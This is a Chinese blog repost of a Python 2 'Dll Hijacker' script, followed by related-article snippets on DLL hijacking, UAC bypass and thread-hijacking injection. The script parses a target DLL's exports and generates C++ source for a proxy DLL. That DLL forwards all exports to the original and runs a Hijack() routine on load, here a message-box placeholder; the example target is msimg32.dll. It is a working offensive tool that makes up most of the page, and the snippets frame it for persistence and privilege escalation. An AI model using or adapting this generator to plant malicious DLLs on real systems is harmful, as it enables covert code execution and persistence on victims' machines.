Dll Hijacker

最新推荐文章于 2024-08-20 13:04:52 发布
最新推荐文章于 2024-08-20 13:04:52 发布
阅读量206 收藏
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/killbit/p/6005831.html
版权 
#coding=utf-8
#
# Dll Hijacker
#
# platform: Python 2.x @ Windows 
#
# author:Coca1ne

import os,sys,time
import pefile


def main():
    try:
        pe = pefile.PE(sys.argv[1])
        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols
        print "[!]Find export function :[ %d ]\r\n" % len(exportTable)
        for exptab in exportTable: 
            print "%3s %10s" % (exptab.ordinal, exptab.name)
        print "\r\n[+] generating DLL Hijack cpp file ..."
        
        generate(exportTable)
        
        print "\r\n[+] generating DLL Hijack cpp file has finished!"
    except Exception, e:
        print e

def generate(exportTable):
    segments = r"//Generate by DLLHijacker.py\
\
#include <Windows.h>\
\
DEFINE_DLL_EXPORT_FUNC\
#define EXTERNC extern \"C\"\
#define NAKED __declspec(naked)\
#define EXPORT __declspec(dllexport)\
#define ALCPP EXPORT NAKED\
#define ALSTD EXTERNC EXPORT NAKED void __stdcall\
#define ALCFAST EXTERNC EXPORT NAKED void __fastcall\
#define ALCDECL EXTERNC NAKED void __cdecl\
\
namespace DLLHijacker\
{\
    HMODULE m_hModule = NULL;\
    DWORD m_dwReturn[17] = {0};\
    inline BOOL WINAPI Load()\
    {\
        TCHAR tzPath[MAX_PATH];\
        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));\
        m_hModule = LoadLibrary(tzPath);\
        if (m_hModule == NULL)\
            return FALSE;\
        return (m_hModule != NULL);\
    }\
    inline VOID WINAPI Free()\
    {\
        if (m_hModule)\
            FreeLibrary(m_hModule);\
    }\
    FARPROC WINAPI GetAddress(PCSTR pszProcName)\
    {\
        FARPROC fpAddress;\
        CHAR szProcName[16];\
        fpAddress = GetProcAddress(m_hModule, pszProcName);\
        if (fpAddress == NULL)\
        {\
            if (HIWORD(pszProcName) == 0)\
            {\
                wsprintf(szProcName, \"%d\", pszProcName);\
                pszProcName = szProcName;\
            }\
            ExitProcess(-2);\
        }\
        return fpAddress;\
    }\
}\
using namespace DLLHijacker;\
VOID Hijack()\
{\
    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);\
}\
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)\
{\
    if (dwReason == DLL_PROCESS_ATTACH)\
    {\
        DisableThreadLibraryCalls(hModule);\
        if(Load())\
            Hijack();\
    }\
    else if (dwReason == DLL_PROCESS_DETACH)\
    {\
        Free();\
    }\
    return TRUE;\
}\
"
    filename = sys.argv[1][sys.argv[1].rindex('\\')+1:sys.argv[1].rindex('.')]
    fp = open(filename + ".cpp", "w+")
    define_dll_exp_func = ""
    for exptable in exportTable:
        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name) +\
                            "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"\")\n"
    segments = segments.replace('DLL_FILENAME', filename)
    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\','')
    fp.writelines(segments)
    
    forward_dll_exp_func = ""
    for exptable in exportTable:
        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)\n{" + \
                            "\n        __asm POP m_dwReturn[0 * TYPE long];\n    GetAddress(\""+ \
                            str(exptable.name) + "\")();\n    __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n"
    fp.writelines(forward_dll_exp_func)
    fp.close()

def usage():
    print "Usage:"
    print "    %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0]

if __name__ == "__main__":
    if(len(sys.argv) <2):
        usage()
    else:
        main()

 

转载于:https://www.cnblogs.com/killbit/p/6005831.html

weixin_30652897
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dll 源码_偷偷学习DLL劫持
weixin_39683526的博客
11-29 1620
文章主要是用来记录学习觉得low啊简单啊的话也不许笑话不然嘴给你们撕烂嘤嘤嘤Q达不溜Q首先是dll劫持的原理ღゝ◡╹)ノ♡就是攻击者能够利用Windows加载DLL的规则将需要劫持程序目录下的合法DLL替换成恶意DLL1.使用DLL_Hijacker.py来生成CPP源码(要注意路径要使用dll文件所在的路径哦):DLL_Hijacker.py "D:\Program Files(x8...
python dllhijacker
osummertime的博客
12-04 855
修复版的Dll Hijacker #coding=utf-8 # # Dll Hijacker # # platform: Python 2.x @ Windows # # author:Coca1ne import os,sys,time import pefile def main(): try: pe = pefile.PE(sys.argv[1]) ...
探索DLLHijacker:一款创新的动态链接库劫持工具
gitblog_00081的博客
04-07 386
探索DLLHijacker:一款创新的动态链接库劫持工具 项目地址:https://gitcode.com/kiwings/DLLHijacker 项目简介 在编程世界中,DLLHijacker 是一个独特的开源项目,它提供了一种技术手段,允许开发者对动态链接库(DLL)的加载过程进行控制和调试。该项目由kiwings 创建并维护,旨在帮助程序员深入理解Windows操作系统中的DLL注入机制,并...
从内网渗透来理解dll劫持的工具
qq_41071646的博客
02-12 653
dll劫持 以前学过 但是并没有注意过 但是这一天在web手的启发下 发现 dll劫持在内网渗透里面的权限维持使用率还是挺高的,, 看来不能小看老技术啊== = 一开始我的想法是 修改exe 然后直接替换exe = = dll 查找的顺序就不说了 这里就了解到三个工具 以及他们的思路 发现学习了不少 第一个是 rattler 这个 是一个查找能利用的dll 主要的...
SuperDllHijack 开源项目教程
gitblog_00090的博客
08-10 413
SuperDllHijack 开源项目教程 SuperDllHijackSuperDllHijack:A general DLL hijack technology, don't need to manually export the same function interface of the DLL, so easy! 一种通用Dll劫持技术,不再需要手工导出Dll的函数接口了项目地址:ht...
sinatra-hijacker
07-06
gem 'sinatra-hijacker' 然后执行: $ bundle 或者自己安装: $ gem install sinatra-hijacker 用法 注册 Sinatra::Hijacker 并通过“websocket”方法定义路由: require 'sinatra' require 'sinatra/...
hijacker:API模拟工具
05-01
劫机者 劫机者可以用作API中继来协助前端开发...正在安装要安装Hijacker,您可以将其安装到特定项目: npm install hijacker或者,您可以全局安装它以允许在终端中使用hijacker命令: npm install -g hijacker设置要设
Hijacker-release-v1.5-beta.6.apk
05-18
Hijacker 是一个安卓平台下的无线渗透工具。它的功能非常强大,几乎集成了 aircrack-ng 套件,mdk3 和 reaver 这些工具的功能。而且采用图形化用户界面,相比命令行界面,使用起来也更加的方便简单!想要成功运行Hij...
Windows Hijacker-开源
07-18
Windows Hijacker 是一种在 Windows 操作系统上劫持 tcp 连接的工具。 WinHijacker 包括 ARP Poisoner for Man In The Middle (MITM) 和一个小的 tcp/ip 堆栈。 对于任何问题,请转到“论坛”部分。 文档位于“文档...
Android-Hijacker.zip
09-17
Android-Hijacker.zip,用于Android的Airpack、Airodump、Aireplay、MDK3和Reaver图形用户界面应用程序,安卓系统是谷歌在2008年设计和制造的。操作系统主要写在爪哇,C和C 的核心组件。它是在linux内核之上构建的,...
信标对象文件(BOF),用于通过线程劫持进行远程进程注入-C/C++开发
05-27
信标对象文件(BOF),用于通过线程劫持进行远程进程注入,而不会产生远程线程。 cThreadHijack ___________.__ .______ ___ .__ __ __ ___ \ __ ___ / | | _________ ____ _____ __ | _ / | \ | __ | | __ | ____ ____ | | __ _ / ___ \ | | | | \ _ __ \ _ / __ \\ __ \ / __ /〜\ | | \ __ \ _ / ___ \ | | / / \ \ ___ | | | Y \ | \ / \ ___ / / __ \ _ / / _ / \ Y / | | | / __ \\ \ ___ | <\ ___> ____ | | ___ | / __ | \ ___> ____ / \ ____ | \ ___ | _ / | __ / \ __ | (____ / \ ___> __ | _ \ \ //
Redis利用方式总结(Linux/Windows)
J0o1ey Blog
05-24 1900
简述 本文收录整理了https://xz.aliyun.com/t/7940 https://www.redmango.top/article/51 等文章 感谢作者们无私分享利用redis优秀姿势,整理后方便大家查阅 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务
科普_DLL劫持原理与实践
KHOST的博客
09-08 1550
0x00 前言 DLL劫持算是一个老的漏洞,而且乌云漏洞库中也有很多的案例,只不过案例更多的只是验证一下,并没有教如何利用。至于为什么专门抓起来再学一遍了,唉,内网渗透需要 0x01 什么是DLL 这里先摘抄一下百度百科的解释: DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可...
DLL劫持技术解析(DLL Hijack)
輚至消亡
07-12 3848
0x01 简介 DLL劫持技术利用的是Windows对DLL访问时查找DLL位置的一个漏洞,Windows对DLL的默认查找顺序(XP SP2及之后)如下: 1. EXE所在文件夹 2. Windows系统目录 3. Windows 16位系统目录 4. Windows目录 5. 当前文件夹 6. PATH环境变量中指出的目录 当我们在EXE程序中导入了某个DLL文件时,其搜索并使...
dll的创建及使用(源码)
Closeall的专栏
09-24 1847
声明: 本文出自:http://blog.csdn.net/closeall2008 可以不经作者同意任意转载,但请保留文章作者及的出处,谢谢dll的创建:下面用代码实例简单的介绍一下如何创建dll以及如何使用dll。       1、首先创建一个dll的头文件。dll的源码文件(.cpp)需要包含这个头文件,而且使用这个动态连接库的可执行文件也需要这个头文件。这个头文件包含你
pragma comment(linker,"/export:Add=OrgTestDll.Add,@1")
autumn20080101的专栏
03-28 1547
LIBRARY   "TestDll" DESCRIPTION  "TestDll" EXPORTS  ;Add /* int __stdcall Add(int a,int b) {  return a+b; } */ #pragma comment(linker,"/export:Add=OrgTestDll.Add,@1") // callDll
看我如何用微信上线CobaltStrike
weixin_35771144的博客
12-11 2561
前言   DLL劫持漏洞是老生常谈的一个漏洞,已经被前辈们各种奇技淫巧玩烂。但DLL劫持技术在后渗透和域渗透中的权限提升和权限维持都起到了至关重要的作用。本文简单剖析DLL劫持技术并通过实例应用来查看如何在渗透工作中利用此项技术。篇幅稍长,各位读者耐心观看,文中有不妥之处请各位加以斧正。 DLL劫持原理 什么是DLL?   DLL是动态链接库文件,在Windows系统中,应用程序并不是一...
UAC 实现原理及绕过方法
weixin_30510153的博客
03-20 1187
目录 0x00 UAC 工作流程 0x01 UAC 实现方法(用户登陆过程) 0x02 UAC 架构 0x03 触发UAC 0x04 UAC 虚拟化 0x05 UAC 逆向分析 1x00 UAC Bypass 1x0...
python之matplotlib (5 散点图和柱状图)
最新发布
这是C.L 的博客,欢迎大家学习浏览!!
08-20 290
附:colormap对照 '%.f'%y‘是标注数据的形式设置:保留两位小数,数据来源于y数组。也可以这样写:f'{y:.2f}',在它前面的参数是标注的位置。也可以是一个数组,表示每个点的颜色不同。ax.bar()中y参数是直方图的高度,其中facecolor是条形图的颜色,而edgecolor是除了条形图内的颜色。也可以是一个数组,表示每个点的大小不同。参数来指定一个colormap,用于映射颜色数组到颜色。
各类恶意代码 描述特征
06-10
恶意代码是指一类有意破坏计算机系统、篡改数据或者盗取隐私信息等恶意行为的软件程序。以下是一些常见的恶意代码及其特征: 1. 病毒:病毒是一种能够自我复制的恶意程序,它会植入到其他合法程序中,通过感染其他文件来传播。常见的病毒有 Melissa 病毒、ILOVEYOU 病毒等。 2. 蠕虫:蠕虫是一种与病毒类似的恶意程序,但它不需要植入到其他程序中,而是通过网络传播。蠕虫会利用网络漏洞或者弱口令等方式入侵其他计算机,然后通过网络传播自身。常见的蠕虫有 Nimda 蠕虫、Blaster 蠕虫等。 3. 木马:木马是一种通过隐藏在合法程序中的恶意代码,可以在用户不知情的情况下控制计算机。常见的木马有 Netbus、Back Orifice 等。 4. 间谍软件:间谍软件是一种可以监视用户计算机活动的恶意程序,它可以记录键盘输入、屏幕截图、网络通信等信息,然后将这些信息发送给攻击者。常见的间谍软件有 Perfect Keylogger、Spyware 等。 5. 广告软件:广告软件是一种常见的恶意程序,它会在用户计算机上弹出广告窗口,或者在浏览器中插入广告。广告软件通常是通过软件捆绑、恶意广告等方式传播的。常见的广告软件有 Adware、Browser Hijacker 等。 这些恶意代码通常都会对计算机系统造成不同程度的破坏和危害,用户应该经常更新杀毒软件、防火墙等安全软件,提高自己的安全防范意识,以保护自己的计算机和信息安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值